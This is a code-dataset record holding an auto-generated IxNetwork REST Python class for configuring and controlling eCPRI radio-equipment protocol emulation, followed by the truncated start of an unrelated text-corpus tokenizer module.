(multiplier)\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Multiplier\"])\n\n @Multiplier.setter\n def Multiplier(self, value):\n # type: (int) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"Multiplier\"], value)\n\n @property\n def Name(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str: Name of NGPF element, guaranteed to be unique in Scenario\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Name\"])\n\n @Name.setter\n def Name(self, value):\n # type: (str) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"Name\"], value)\n\n @property\n def NumberOfFaultSubObjects(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: Number Of Fault or Notify.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"NumberOfFaultSubObjects\"])\n\n @NumberOfFaultSubObjects.setter\n def NumberOfFaultSubObjects(self, value):\n # type: (int) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"NumberOfFaultSubObjects\"], value)\n\n @property\n def ReadWriteType(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The field consist of two parts, a read or write indication and a request or response indication. The Response value 0010b (Failure) is used when the receiver of the request is unable to perform the read or write request due to invalid content in received parameters or other faults.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"ReadWriteType\"]))\n\n @property\n def RemoteResetId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Depending on implementation the Reset ID could be used for instance to point out a specific instance of a generic hardware function. 
Value allocation to Reset ID is vendor specific.\n        \"\"\"\n        from ixnetwork_restpy.multivalue import Multivalue\n\n        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"RemoteResetId\"]))\n\n    @property\n    def ReservedActionType(self):\n        # type: () -> 'Multivalue'\n        \"\"\"\n        Returns\n        -------\n        - obj(ixnetwork_restpy.multivalue.Multivalue): The Action Type is a 1-byte value. Value 0x00 and 0x01 are used when an eCPRI node initiates a one-way delay measurement in direction from its own node to another node. Value 0x02 is used when an eCPRI node needs to know the one-way delay from another node to itself.\n        \"\"\"\n        from ixnetwork_restpy.multivalue import Multivalue\n\n        return Multivalue(\n            self, self._get_attribute(self._SDM_ATT_MAP[\"ReservedActionType\"])\n        )\n\n    @property\n    def ReservedEventType(self):\n        # type: () -> 'Multivalue'\n        \"\"\"\n        Returns\n        -------\n        - obj(ixnetwork_restpy.multivalue.Multivalue): Reserved Event Type values from 0x06 to 0xFF are Reserved.\n        \"\"\"\n        from ixnetwork_restpy.multivalue import Multivalue\n\n        return Multivalue(\n            self, self._get_attribute(self._SDM_ATT_MAP[\"ReservedEventType\"])\n        )\n\n    @property\n    def ReservedResetCode(self):\n        # type: () -> 'Multivalue'\n        \"\"\"\n        Returns\n        -------\n        - obj(ixnetwork_restpy.multivalue.Multivalue): The Reset Code Op is a 1-byte value. Value 0x00 represents Reserved, 0x01 represents Remote reset request, 0x02 represents Remote reset response and values ranging from 0x03 to 0xFF are Reserved.\n        \"\"\"\n        from ixnetwork_restpy.multivalue import Multivalue\n\n        return Multivalue(\n            self, self._get_attribute(self._SDM_ATT_MAP[\"ReservedResetCode\"])\n        )\n\n    @property\n    def ResetCodeOp(self):\n        # type: () -> 'Multivalue'\n        \"\"\"\n        Returns\n        -------\n        - obj(ixnetwork_restpy.multivalue.Multivalue): The Reset Code Op is a 1-byte value. Value 0x00 represents Reserved, 0x01 represents Remote Reset Request, 0x02 represents Remote Reset Response. Values from 0x03 to 0xFF are Reserved.\n        \"\"\"\n        from ixnetwork_restpy.multivalue import Multivalue\n\n        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"ResetCodeOp\"]))\n\n    @property\n    def RmaAction(self):\n        # type: () -> 'Multivalue'\n        \"\"\"\n        Returns\n        -------\n        - obj(ixnetwork_restpy.multivalue.Multivalue): RMA Action Type is Request or Response or Failure.\n        \"\"\"\n        from ixnetwork_restpy.multivalue import Multivalue\n\n        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"RmaAction\"]))\n\n    @property\n    def RmaDataLength(self):\n        # type: () -> 'Multivalue'\n        \"\"\"\n        Returns\n        -------\n        - obj(ixnetwork_restpy.multivalue.Multivalue): Number of bytes(0 to 255) to read or write from or to remote node.\n        \"\"\"\n        from ixnetwork_restpy.multivalue import Multivalue\n\n        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"RmaDataLength\"]))\n\n    @property\n    def RtcDataLength(self):\n        # type: () -> 'Multivalue'\n        \"\"\"\n        Returns\n        -------\n        - obj(ixnetwork_restpy.multivalue.Multivalue): Size of RTC data that will be included in the eCPRI message.\n        \"\"\"\n        from ixnetwork_restpy.multivalue import Multivalue\n\n        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"RtcDataLength\"]))\n\n    @property\n    def SequenceId(self):\n        # type: () -> 'Multivalue'\n        \"\"\"\n        Returns\n        -------\n        - obj(ixnetwork_restpy.multivalue.Multivalue): An identifier of each message in a series of Real-Time Control Data messages. For example, identifier of message sequence, links between request and response messages, etc. 
Value allocation to SEQ_ID is vendor specific.\n        \"\"\"\n        from ixnetwork_restpy.multivalue import Multivalue\n\n        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"SequenceId\"]))\n\n    @property\n    def SessionStatus(self):\n        # type: () -> List[str]\n        \"\"\"\n        Returns\n        -------\n        - list(str[down | notStarted | up]): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation didn't successfully complete (yet). Up - session came up successfully.\n        \"\"\"\n        return self._get_attribute(self._SDM_ATT_MAP[\"SessionStatus\"])\n\n    @property\n    def StackedLayers(self):\n        # type: () -> List[str]\n        \"\"\"\n        Returns\n        -------\n        - list(str[None | /api/v1/sessions/1/ixnetwork/topology]): List of secondary (many to one) child layer protocols\n        \"\"\"\n        return self._get_attribute(self._SDM_ATT_MAP[\"StackedLayers\"])\n\n    @StackedLayers.setter\n    def StackedLayers(self, value):\n        # type: (List[str]) -> None\n        self._set_attribute(self._SDM_ATT_MAP[\"StackedLayers\"], value)\n\n    @property\n    def StartingRmaId(self):\n        # type: () -> 'Multivalue'\n        \"\"\"\n        Returns\n        -------\n        - obj(ixnetwork_restpy.multivalue.Multivalue): Identifier of the request message used by the Initiator to match the corresponding response message.\n        \"\"\"\n        from ixnetwork_restpy.multivalue import Multivalue\n\n        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"StartingRmaId\"]))\n\n    @property\n    def StartingRtcId(self):\n        # type: () -> 'Multivalue'\n        \"\"\"\n        Returns\n        -------\n        - obj(ixnetwork_restpy.multivalue.Multivalue): RTC ID of the eRE or eREC.\n        \"\"\"\n        from ixnetwork_restpy.multivalue import Multivalue\n\n        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"StartingRtcId\"]))\n\n    @property\n    def StateCounts(self):\n        \"\"\"\n        Returns\n        -------\n        - dict(total:number,notStarted:number,down:number,up:number): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up\n        \"\"\"\n        return self._get_attribute(self._SDM_ATT_MAP[\"StateCounts\"])\n\n    @property\n    def Status(self):\n        # type: () -> str\n        \"\"\"\n        Returns\n        -------\n        - str(configured | error | mixed | notStarted | started | starting | stopping): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.\n        \"\"\"\n        return self._get_attribute(self._SDM_ATT_MAP[\"Status\"])\n\n    @property\n    def TimeStamp(self):\n        # type: () -> 'Multivalue'\n        \"\"\"\n        Returns\n        -------\n        - obj(ixnetwork_restpy.multivalue.Multivalue): When Action Type is set to 0x00 (Request) in the message this field will contain the time stamp t1 and when Action Type is set to 0x02 (Response) the time stamp t2. When action type is set to 0x01(Request with Follow_Up) the time stamp information fields shall be set to 0b in all bits, the corresponding time information values are sent in the Follow_Up message. When Action Type is set to 0x03 or 0x04 (Remote Request and Remote Request with Follow_Up) the time stamp information fields shall be set to 0b in all bits. When using the Follow_Up message (2-Step version) the Follow_Up message (Action Type set to 0x05) the time information values t1 and tCV1 will be set to the TimeStamp field. The time information values follow the format specified in IEEE 1588-2008 [13] Clause 5.3.3. The value consists of 2 parts, one seconds-part and one nanoseconds-part. 
The first 6 bytes are the seconds and the next 4 bytes are the nanoseconds.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"TimeStamp\"]))\n\n @property\n def VendorSpecificPayloadLength(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Vendor Specific Payload bytes are used to carry optional vendor-specific information. The vendor specific information can contain data items such as authentication parameters or any parameters to select a specific reset behavior. This specification does not detail any concrete reset behavior.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"VendorSpecificPayloadLength\"])\n )\n\n def update(\n self,\n ConnectedVia=None,\n MessageType=None,\n Multiplier=None,\n Name=None,\n NumberOfFaultSubObjects=None,\n StackedLayers=None,\n ):\n # type: (List[str], str, int, str, int, List[str]) -> ECpriRe\n \"\"\"Updates eCpriRe resource on the server.\n\n This method has some named parameters with a type: obj (Multivalue).\n The Multivalue class has documentation that details the possible values for those named parameters.\n\n Args\n ----\n - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of layers this layer is used to connect with to the wire.\n - MessageType (str(realTimeControlData | remoteMemoryAccess | onewayDelayMeasurement | remoteReset | eventIndication)): Message Type\n - Multiplier (number): Number of layer instances per parent instance (multiplier)\n - Name (str): Name of NGPF element, guaranteed to be unique in Scenario\n - NumberOfFaultSubObjects (number): Number Of Fault or Notify.\n - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of secondary (many to one) child layer protocols\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def add(\n self,\n ConnectedVia=None,\n MessageType=None,\n Multiplier=None,\n Name=None,\n NumberOfFaultSubObjects=None,\n StackedLayers=None,\n ):\n # type: (List[str], str, int, str, int, List[str]) -> ECpriRe\n \"\"\"Adds a new eCpriRe resource on the server and adds it to the container.\n\n Args\n ----\n - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of layers this layer is used to connect with to the wire.\n - MessageType (str(realTimeControlData | remoteMemoryAccess | onewayDelayMeasurement | remoteReset | eventIndication)): Message Type\n - Multiplier (number): Number of layer instances per parent instance (multiplier)\n - Name (str): Name of NGPF element, guaranteed to be unique in Scenario\n - NumberOfFaultSubObjects (number): Number Of Fault or Notify.\n - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of secondary (many to one) child layer protocols\n\n Returns\n -------\n - self: This instance with all currently retrieved eCpriRe resources using find and the newly added eCpriRe resources available through an iterator or index\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def remove(self):\n \"\"\"Deletes all the contained eCpriRe resources in this instance from the server.\n\n Raises\n ------\n - NotFoundError: 
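The update/add methods of this record share the same named parameters. A minimal usage sketch follows; the `parent` handle and its child-accessor spelling are assumptions for illustration, while the add/update signatures themselves come from the docstrings above:

# Hypothetical parent NGPF handle; only add()/update() are taken from the
# documented signatures above.
ecpri_re = parent.ECpriRe.add(
    MessageType="remoteReset",  # one of the documented enum values
    Multiplier=1,
    Name="ecpri-re-1",
)
# Reconfigure later with the same named parameters.
ecpri_re.update(Name="ecpri-re-renamed")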
The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n self._delete()\n\n def find(\n self,\n ConnectedVia=None,\n Count=None,\n DescriptiveName=None,\n Errors=None,\n MessageType=None,\n Multiplier=None,\n Name=None,\n NumberOfFaultSubObjects=None,\n SessionStatus=None,\n StackedLayers=None,\n StateCounts=None,\n Status=None,\n ):\n \"\"\"Finds and retrieves eCpriRe resources from the server.\n\n All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve eCpriRe resources from the server.\n To retrieve an exact match ensure the parameter value starts with ^ and ends with $\n By default the find method takes no parameters and will retrieve all eCpriRe resources from the server.\n\n Args\n ----\n - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of layers this layer is used to connect with to the wire.\n - Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.\n - DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.\n - Errors (list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork/],arg2:list[str]))): A list of errors that have occurred\n - MessageType (str(realTimeControlData | remoteMemoryAccess | onewayDelayMeasurement | remoteReset | eventIndication)): Message Type\n - Multiplier (number): Number of layer instances per parent instance (multiplier)\n - Name (str): Name of NGPF element, guaranteed to be unique in Scenario\n - NumberOfFaultSubObjects (number): Number Of Fault or Notify.\n - SessionStatus (list(str[down | notStarted | up])): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation hasn't successfully completed (yet). Up - session came up successfully.\n - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of secondary (many to one) child layer protocols\n - StateCounts (dict(total:number,notStarted:number,down:number,up:number)): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up\n - Status (str(configured | error | mixed | notStarted | started | starting | stopping)): Running status of associated network element. 
Once in Started state, protocol sessions will begin to negotiate.\n\n Returns\n -------\n - self: This instance with matching eCpriRe resources retrieved from the server available through an iterator or index\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def read(self, href):\n \"\"\"Retrieves a single instance of eCpriRe data from the server.\n\n Args\n ----\n - href (str): An href to the instance to be retrieved\n\n Returns\n -------\n - self: This instance with the eCpriRe resources from the server available through an iterator or index\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._read(href)\n\n def Abort(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the abort operation on the server.\n\n Abort CPF control plane (equals to demote to kUnconfigured state).\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n abort(async_operation=bool)\n ---------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n abort(SessionIndices=list, async_operation=bool)\n ------------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n abort(SessionIndices=string, async_operation=bool)\n --------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"abort\", payload=payload, response_object=None)\n\n def RestartDown(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the restartDown operation on the server.\n\n Stop and start interfaces and sessions that are in Down state.\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n restartDown(async_operation=bool)\n ---------------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n restartDown(SessionIndices=list, async_operation=bool)\n ------------------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. 
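Per the find docstring above, every named parameter is evaluated server-side as a regex, and anchoring with ^ and $ gives an exact match. A short sketch of both retrieval styles, plus the SessionIndices formats the exec methods document ("1 2 3" as a list, "1-4;6;7-12" as a string); the `ecpri_re` handle carries over from the earlier hypothetical sketch:

# Regex match: any resource whose Name contains "ecpri".
matches = ecpri_re.find(Name="ecpri")
# Exact match: anchor the pattern as the docstring suggests.
exact = ecpri_re.find(Name="^ecpri-re-1$")
# Exec methods accept a range-string of session indices.
exact.Start(SessionIndices="1-4;6;7-12", async_operation=False)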
Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n restartDown(SessionIndices=string, async_operation=bool)\n --------------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"restartDown\", payload=payload, response_object=None)\n\n def Start(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the start operation on the server.\n\n Start CPF control plane (equals to promote to negotiated state).\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n start(async_operation=bool)\n ---------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n start(SessionIndices=list, async_operation=bool)\n ------------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n start(SessionIndices=string, async_operation=bool)\n --------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"start\", payload=payload, response_object=None)\n\n def Stop(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the stop operation on the server.\n\n Stop CPF control plane (equals to demote to PreValidated-DoDDone state).\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n stop(async_operation=bool)\n --------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n stop(SessionIndices=list, async_operation=bool)\n -----------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. 
Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n stop(SessionIndices=string, async_operation=bool)\n -------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"stop\", payload=payload, response_object=None)\n\n def get_device_ids(\n self,\n PortNames=None,\n ActionType=None,\n Active=None,\n Address=None,\n CompensationValue=None,\n DelayMeasurementId=None,\n DummyBytesLength=None,\n ElementId=None,\n EventId=None,\n EventSequenceNumber=None,\n EventType=None,\n ReadWriteType=None,\n RemoteResetId=None,\n ReservedActionType=None,\n ReservedEventType=None,\n ReservedResetCode=None,\n ResetCodeOp=None,\n RmaAction=None,\n RmaDataLength=None,\n RtcDataLength=None,\n SequenceId=None,\n StartingRmaId=None,\n StartingRtcId=None,\n TimeStamp=None,\n VendorSpecificPayloadLength=None,\n ):\n \"\"\"Base class infrastructure that gets a list of eCpriRe device ids encapsulated by this object.\n\n Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.\n\n Args\n ----\n - PortNames (str): optional regex of port names\n - ActionType (str): optional regex of actionType\n - Active (str): optional regex of active\n - Address (str): optional regex of address\n - CompensationValue (str): optional regex of compensationValue\n - DelayMeasurementId (str): optional regex of delayMeasurementId\n - DummyBytesLength (str): optional regex of dummyBytesLength\n - ElementId (str): optional regex of elementId\n - EventId (str): optional regex of eventId\n - EventSequenceNumber (str): optional regex of eventSequenceNumber\n - EventType (str): optional regex of eventType\n - ReadWriteType (str): optional regex of readWriteType\n - RemoteResetId (str): optional regex of remoteResetId\n - ReservedActionType (str): optional regex of reservedActionType\n - ReservedEventType (str): optional regex of reservedEventType\n - ReservedResetCode (str): optional regex of reservedResetCode\n - ResetCodeOp (str): optional regex of resetCodeOp\n - RmaAction (str): optional regex of rmaAction\n - RmaDataLength (str): optional regex of rmaDataLength\n - RtcDataLength (str): optional regex of rtcDataLength\n - SequenceId (str): optional regex of sequenceId\n - StartingRmaId (str): optional regex of startingRmaId\n - StartingRtcId (str): optional regex of startingRtcId\n - TimeStamp (str): optional regex of timeStamp\n - VendorSpecificPayloadLength (str): optional regex of vendorSpecificPayloadLength\n\n Returns\n -------\n - list(int): A list of device ids that meets the regex criteria provided in the method parameters\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._get_ngpf_device_ids(locals())\n", "sub_path": "ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/ecprire_51f1030cbafd2e567d3b517032a1b011.py", "file_name": 
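get_device_ids applies the same per-attribute regex idea to narrow the device ids encapsulated by the object. A hedged sketch, with illustrative attribute values only:

# Only devices on port "p1" whose resetCodeOp multivalue matches "1".
device_ids = ecpri_re.get_device_ids(PortNames="^p1$", ResetCodeOp="^1$")
print(device_ids)  # list(int) per the docstring above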
"ecprire_51f1030cbafd2e567d3b517032a1b011.py", "file_ext": "py", "file_size_in_byte": 43244, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.version_info", "line_number": 26, "usage_type": "attribute"}, {"api_name": "ixnetwork_restpy.base.Base", "line_number": 30, "usage_type": "name"}, {"api_name": "ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector", "line_number": 117, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ecprifaultsubobjectslist_066a935ffc4b8b88998000da08d713eb.ECpriFaultSubObjectsList", "line_number": 137, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.orandu_3c913d8352aa36ef882a1ba8a0683584.OranDU", "line_number": 157, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.oranru_c5d61b81f2557e778753a97ef8b7363b.OranRU", "line_number": 177, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 189, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 201, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 213, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 225, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 264, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 288, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 302, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 323, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 335, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 349, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 421, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 433, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 445, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 459, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 473, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 487, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 499, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 511, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 523, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 535, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 572, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 584, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 615, "usage_type": "call"}, {"api_name": "ixnetwork_restpy.multivalue.Multivalue", "line_number": 627, "usage_type": "call"}]} +{"seq_id": "642630602", "text": "import itertools\n\nimport datetime\nimport logging\n\nimport time\nfrom bson import ObjectId\n\nfrom 
. import preprocessing\nfrom ..utils.time_utils import estimate_eta\n\n__author__ = \"Haoyan Huo\"\n__maintainer__ = \"Haoyan Huo\"\n__email__ = \"haoyan.huo@lbl.gov\"\n\n\nclass CorpusTokenizer(object):\n def __init__(self, document_generator, token_storage, token_filter):\n \"\"\"\n Tokenize documents in a corpus into individual tokens.\n\n :param document_generator: A generator that gives documents, or (label, document) tuples.\n :param token_storage: Token storage instance.\n :type token_storage: TokenStorage\n :param token_filter:\n \"\"\"\n self.document_generator = document_generator\n self.token_storage = token_storage\n self.token_filter = token_filter\n\n def _feed_storage(self, tokens, label):\n for token in tokens:\n if not isinstance(token, str):\n raise ValueError('token must be a str object!')\n if ' ' in token:\n raise ValueError('token must not contain whitespace!')\n if '\\n' in token:\n raise ValueError('token must not contain newline!')\n\n self.token_storage.feed(tokens, label=label)\n\n def _process_sentences(self, sentences, document_label, processor):\n if not sentences:\n return\n\n orths, lemma, pos = zip(*sentences)\n orths = list(itertools.chain(*orths))\n lemma = list(itertools.chain(*lemma))\n pos = list(itertools.chain(*pos))\n tokens = self.token_filter(orths, lemma, pos)\n if not tokens:\n return\n\n self._feed_storage(tokens, document_label)\n\n def _process_document(self, document, label):\n document = document.strip()\n processor = preprocessing.TextPreprocessor(document)\n cde_doc = processor.doc.user_data\n all_lemmas = processor.get_words(lemma=True)\n\n sentences = []\n for sentence in cde_doc.sentences:\n orths, pos = zip(*sentence.pos_tagged_tokens)\n orths, pos = list(orths), list(pos)\n lemma = all_lemmas[:len(orths)]\n all_lemmas = all_lemmas[len(orths):]\n\n sentences.append((orths, lemma, pos))\n\n self._process_sentences(sentences, label, processor)\n\n def tokenize(self, callback=None):\n for i_doc, document in enumerate(self.document_generator, start=1):\n if isinstance(document, tuple):\n if len(document) != 2:\n raise ValueError('document generator must yield (label, document) each time, '\n 'expected size 2, got %d!' 
% len(document))\n label, document = document\n else:\n label = str(i_doc)\n\n self._process_document(document, label)\n\n if callback is not None:\n callback(i_doc, document)\n\n\nclass CorpusSentenceTokenizer(CorpusTokenizer):\n def _process_sentences(self, sentences, document_label, processor):\n cde_doc = processor.doc.user_data\n for (orths, lemma, pos), sentence in zip(sentences, cde_doc.sentences):\n sent_start, sent_end = sentence.start, sentence.end\n tokens = self.token_filter(orths, lemma, pos)\n if not tokens:\n return\n\n self._feed_storage(tokens, '%s:%d-%d' % (document_label, sent_start, sent_end))\n\n\nclass CorpusToken(object):\n def __init__(self, syn_20170926, destination_collection):\n \"\"\"Generate a collection of tokenized words from syn_20170926.\n\n :param syn_20170926: Documents collection.\n :type syn_20170926: pymongo.collection.Collection or None\n :param destination_collection: Destination collection.\n :type destination_collection: pymongo.collection.Collection\n \"\"\"\n self.syn_20170926 = syn_20170926\n self.destination_collection = destination_collection\n\n self._logger = logging.getLogger('CorpusToken')\n\n def is_collection_ready(self):\n \"\"\"Test if we have a ready to use collection.\n\n :rtype: bool\n \"\"\"\n return self.destination_collection.find_one({}) is not None\n\n def _iter_paragraphs(self, document_id_fn, paragraph_filter, token_filter):\n num_total_docs = self.destination_collection.find().count()\n check_time = time.time()\n start_time = check_time\n n = 0\n\n doc_id_f = open(document_id_fn, 'w') if document_id_fn is not None else None\n\n for n, obj in enumerate(self.destination_collection.find()):\n for m, p in enumerate(obj['paragraphs']):\n\n if paragraph_filter is not None:\n p = paragraph_filter(p)\n if p is None:\n continue\n\n tokens = []\n\n for sent in p['sentences']:\n orth = sent['orth']\n lemma = sent['lemmas']\n pos = sent['pos']\n\n if token_filter is not None:\n _tokens = token_filter(orth, lemma, pos)\n else:\n _tokens = lemma\n\n if _tokens is None:\n continue\n tokens += _tokens\n\n if tokens:\n if doc_id_f:\n doc_id_f.write('{}:{}\\n'.format(obj['doi'], m))\n yield tokens\n\n n += 1\n if time.time() - check_time > 5:\n self._logger.info('Processed %d/%d documents in 